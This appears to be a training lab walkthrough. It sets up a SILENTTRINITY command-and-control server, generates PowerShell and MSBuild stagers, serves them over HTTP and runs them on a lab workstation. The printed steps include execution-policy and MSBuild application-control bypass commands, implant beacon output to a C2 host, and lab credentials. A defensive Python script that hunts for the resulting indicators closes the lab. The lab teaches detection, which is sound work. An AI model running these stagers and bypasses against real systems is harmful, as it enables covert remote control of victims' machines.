In this lab, the student will stand up a C2 framework, create a listener for two malware implants, generate stagers, and detonate the payloads. The malware will leave a trail of IoCs that are discoverable in Elastic.
Initiate a Command and Control framework. Create malware and launch the Command and Control malware session on the Windows 10 workstation. Hunt for Indicators of Compromise.
To begin this lab, you will first connect to the Member Server (WS01). Then, you will connect to the Linux server at 10.10.98.20.
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Upon the first connection to an SSH server, you may get a pop-up warning asking you to accept the remote server's SSL certificate (what PuTTY is actually asking you to trust is the server's SSH host key; this prompt is expected on a first connection). Accept it and you will be prompted for credentials as a new window opens. The new window (it will have a black background) is the PuTTY SSH session. When you close the PuTTY window, the SSH session is disconnected. During this lab it will be necessary to have multiple SSH sessions open.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
With the PowerShell window open, run the following command, which launches PuTTY and initiates a connection to the server at 10.10.98.20. The command instructs PuTTY to open an SSH session to 10.10.98.20 and specifies the "itadmin" username.
putty -ssh itadmin@10.10.98.20
As previously discussed, you may receive an alert regarding the SSH server's certificate (host key). You will then be prompted for credentials. The password for the "itadmin@10.10.98.20" account is:
APTClass2021!
Working now within the PuTTY session, use the following commands to access the SILENTTRINITY directory as root and access the virtual environment:
cd /opt/SilentTrinity
Launch the Silent Trinity team server inside a screen session, so it keeps running if this SSH session is closed:
screen -S ST-teamserver
sudo python3.8 st teamserver --port 81 10.10.98.20 APTClass!
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
SSH to 10.10.98.20 using the PuTTY client installed on the WS01 system: open a PowerShell window and then execute putty from the command line.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
From the PowerShell window, again connect to the Linux server with PuTTY.
putty -ssh itadmin@10.10.98.20
We will now use the Bash prompt on the SSH server to create a screen session, then connect to the ST server as a client.
A screen session keeps its processes running if the SSH connection drops and can be reattached later, which gives you a persistent session.
cd /opt/SilentTrinity
It is the same process to get to this point for both Console Session 1 and Console Session 2 (and the same outcome).
Now, connect to the team-server as a client with the following command:
sudo python3.8 st client wss://itadmin:APTClass\!@10.10.98.20:81
You will now be connected to the Silent Trinity C2 server.
Once the SilentTrinity client has connected, execute the following commands one at a time.
listeners
use https
set port 4444
options
start
There is now an HTTPS listener running on TCP port 4444 waiting for connections.
A stager is the small initial package that tells the implant to reach out to the command server for the remaining instructions (bits / bytes / malware stage). No stagers have been generated yet, so generate one for PowerShell and one for MSBuild:
stagers
use powershell
generate https
use msbuild
generate https
Both stagers now reside in the /opt/SilentTrinity/ directory.
The next step of this lab opens a third SSH session, creates a new directory to host the malware stagers, moves the stagers into it and serves them over HTTP.
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
From the PowerShell window, again connect to the Linux server with PuTTY.
putty -ssh itadmin@10.10.98.20
Now that the malware stagers have been generated, let's move them into a new folder.
sudo -s
mkdir /opt/web
mv /opt/SilentTrinity/stager.* /opt/web
cd /opt/web
ls
Next, host the stagers with Python 3's http.server module, which serves the current directory over plain HTTP on TCP port 8000 by default.
python3 -m http.server
The malware is now being hosted on the Linux server at http://10.10.98.20:8000; the next steps of the lab download and execute it on the workstation.
With the SilentTrinity framework running, an attacker client connected, and the malware generated and served, it's time to download the malware and attempt to execute it on the Member Server, WS01.
Connect via Remote Desktop to the Member Server, WS01.
Open Internet Explorer.
Navigate using Internet Explorer’s address bar to http://10.10.98.20:8000 and download both stagers.
http://10.10.98.20:8000
Right (alternate) click both items and choose Save target as... Both items should be saved under the user’s Downloads folder.
A warning may be presented that can be ignored.
After the malware stagers have been downloaded, continue onto the next step of the lab to execute the malware.
Continuing with the Remote Desktop Session on Member Server WS01, we now will execute the downloaded malware.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
In PowerShell, run the following commands to execute the PowerShell malware stager for Silent Trinity.
Set-ExecutionPolicy bypass -Force
Import-Module .\Downloads\stager.ps1
PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> Import-Module .\Downloads\stager.ps1
[*] Found info in embedded resources:
- GUID: 00000000-0000-0000-0000-000000000000
- PSK: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- URLS: ####BEGIN_URLS_SECTION####loremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsum####END_URLS_SECTION####
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Downloaded 569104 bytes
[-] 'Boo.Lang.Compiler.dll' was required...
[+] 'Boo.Lang.Compiler.dll' loaded...
[-] 'Boo.Lang.dll' was required...
[+] 'Boo.Lang.dll' loaded...
[*] Compiling Stage Code
[-] 'Boo.Lang.Extensions.dll' was required...
[+] 'Boo.Lang.Extensions.dll' loaded...
[-] 'System.dll' was required...
[+] 'System.dll' loaded...
[-] 'System.Core.dll' was required...
[+] 'System.Core.dll' loaded...
[-] 'System.Web.Extensions.dll' was required...
[+] 'System.Web.Extensions.dll' loaded...
[-] 'Boo.Lang.Parser.dll' was required...
[+] 'Boo.Lang.Parser.dll' loaded...
[-] 'Microsoft.VisualBasic.Devices.dll' was required...
[-] 'Microsoft.VisualBasic.dll' was required...
[+] 'Microsoft.VisualBasic.dll' loaded...
[+] Compilation Successful!
[*] Executing
Jr8d3q6GpM CheckIn
After the malware stager has been executed, continue on to the next phase of the lab.
In an environment where application control is enforced, the Microsoft-signed MSBuild.exe binary can be useful to an attacker because it is a trusted executable that will run code supplied to it. This lab environment does not restrict application execution in that manner, but this section demonstrates the malware stager being executed through MSBuild so that the resulting IoCs can be hunted.
Next, in PowerShell, run the following commands to execute the stager for Silent Trinity with the trusted MSBuild binary.
cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
.\MSBuild.exe c:\Users\itadmin\Downloads\stager.xml
(Note if the above fails, try:)
.\MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
C:\Users\itadmin>
C:\Users\itadmin> cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
c:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
Microsoft (R) Build Engine version 4.8.3752.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 3/16/2020 6:58:05 PM.
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Downloaded 569104 bytes
[-] 'Boo.Lang.Compiler.dll' was required...
[+] 'Boo.Lang.Compiler.dll' loaded...
[-] 'Boo.Lang.dll' was required...
[+] 'Boo.Lang.dll' loaded...
[*] Compiling Stage Code
[-] 'Boo.Lang.Extensions.dll' was required...
[+] 'Boo.Lang.Extensions.dll' loaded...
[-] 'Boo.Lang.Parser.dll' was required...
[+] 'Boo.Lang.Parser.dll' loaded...
[-] 'Microsoft.VisualBasic.Devices.dll' was required...
[+] Compilation Successful!
[*] Executing
z8DiGrOcG3 CheckIn
Having launched the malware stagers from both PowerShell and MSBuild, the next lab steps confirm that the Command-and-Control malware has checked into the team server.
With the team server configured and the Command and Control malware configured, built, hosted, and executed, the workstation should now have two command and control sessions open to the team server.
Return to the SSH session that was operating the team-server's client (SSH Session Two). Check the team server's client side for client sessions with the following commands:
sessions
list
[1] ST (stagers)(msbuild) ≫ sessions
[1] ST (sessions) ≫ list
┌Sessions──────────────────────────────┬─────────────────────────────┬──────────────┬──────────────┐
│ Name │ User │ Address │ Last Checkin │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 521a336b-e199-4bff-a81a-2207f37d79b2 │ LABS\itadmin@WS10-01 │ 10.10.98.14 │ 00h 00m 01s │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 162f4b13-6181-4d7f-988f-4da6c43fc307 │ LABS\itadmin@WS10-01 │ 10.10.98.14 │ 00h 00m 00s │
└──────────────────────────────────────┴─────────────────────────────┴──────────────┴──────────────┘
[1] ST (sessions) ≫
Having built a C2 framework and connected the Member Server into it, let's begin the hunt.
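The trail this lab leaves on WS01 is concrete: a PowerShell execution-policy bypass and an Import-Module of a script from the Downloads folder, MSBuild.exe building a "project" from a user profile path, and both powershell.exe and MSBuild.exe beaconing to 10.10.98.20 on TCP 4444. The following script is an added example written for this page (it is not part of the lab or of SILENTTRINITY) that turns those IoCs into hunting rules and runs them over constructed event records. It assumes the host telemetry is Sysmon ProcessCreate (Event ID 1) and NetworkConnect (Event ID 3) plus PowerShell script block logging (Event ID 4104); the field names, rule names and the sample events are all constructed here, and the rules are written a little more generally than the lab (any project file under C:\Users, any MSBuild network connection) so they also catch close variants.

```python
"""Hunt for the IoCs this lab leaves behind, over constructed Sysmon-style events.

Added example for this page, not lab or SILENTTRINITY code. Event IDs follow
Sysmon (1 = ProcessCreate, 3 = NetworkConnect) and PowerShell (4104 = script
block); the dictionary field names are this script's own simplification.
"""
import ntpath
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "msbuild.exe"}   # LOLBins the lab abuses
BENIGN_WEB_PORTS = {80, 443}                       # ports that need more context

# Constructed events mirroring the lab steps on WS01: the interactive
# PowerShell commands, MSBuild loading stager.xml, both implants calling back
# to the HTTPS listener on 4444, and two benign events to show rules stay quiet.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "ws01", "script_block": "Set-ExecutionPolicy bypass -Force"},
    {"event_id": 4104, "host": "ws01", "script_block": r"Import-Module .\Downloads\stager.ps1"},
    {"event_id": 3, "host": "ws01", "dest_ip": "10.10.98.20", "dest_port": 4444,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"event_id": 1, "host": "ws01",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml"},
    {"event_id": 3, "host": "ws01", "dest_ip": "10.10.98.20", "dest_port": 4444,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    # benign noise: a real build from a build tree, and PowerShell talking HTTPS
    {"event_id": 1, "host": "ws01",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe c:\build\app\app.csproj"},
    {"event_id": 3, "host": "ws01", "dest_ip": "10.10.98.21", "dest_port": 443,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def _basename(image):
    # ntpath handles Windows paths regardless of the platform the hunt runs on
    return ntpath.basename(image).lower()


def rule_msbuild_project_in_user_profile(ev):
    """EID 1: MSBuild.exe given a project/XML file that lives under C:\\Users."""
    if ev.get("event_id") != 1 or _basename(ev.get("image", "")) != "msbuild.exe":
        return None
    m = re.search(r"c:\\users\\\S+\.(?:xml|\w*proj)", ev.get("command_line", ""), re.I)
    return Finding("msbuild_project_in_user_profile", ev["host"], m.group(0)) if m else None


def rule_powershell_script_block(ev):
    """EID 4104: execution-policy bypass, or a module imported from Downloads."""
    if ev.get("event_id") != 4104:
        return None
    text = ev.get("script_block", "")
    if re.search(r"set-executionpolicy\s+bypass", text, re.I):
        return Finding("powershell_executionpolicy_bypass", ev["host"], text.strip())
    if re.search(r"import-module\s+\S*downloads\\", text, re.I):
        return Finding("powershell_module_from_downloads", ev["host"], text.strip())
    return None


def rule_script_host_beacon(ev):
    """EID 3: MSBuild making any outbound connection, or powershell.exe on a non-web port."""
    if ev.get("event_id") != 3:
        return None
    img = _basename(ev.get("image", ""))
    if img == "msbuild.exe" or (img in SCRIPT_HOSTS and ev.get("dest_port") not in BENIGN_WEB_PORTS):
        return Finding("script_host_beacon", ev["host"], f"{img} -> {ev['dest_ip']}:{ev['dest_port']}")
    return None


RULES = [rule_msbuild_project_in_user_profile, rule_powershell_script_block, rule_script_host_beacon]


def hunt(events):
    """Run every rule over every event; return findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


def summarize_by_host(findings):
    """Map host -> sorted, de-duplicated rule names, to see the whole chain per machine."""
    summary = {}
    for f in findings:
        summary.setdefault(f.host, set()).add(f.rule)
    return {host: sorted(rules) for host, rules in summary.items()}


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.host}] {f.rule}: {f.detail}")
    print(summarize_by_host(hunt(SAMPLE_EVENTS)))
```

Each rule maps directly to a step above, so the same conditions translate into Elastic queries for the hunt in the next lab (process name plus command-line path for the MSBuild rule, script block text for the PowerShell rules, process name plus destination port for the beacon rule). The benign MSBuild build and the PowerShell HTTPS connection produce no findings, which is the check to run before deploying any of these as alerts.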
Continue on to L1130-Blue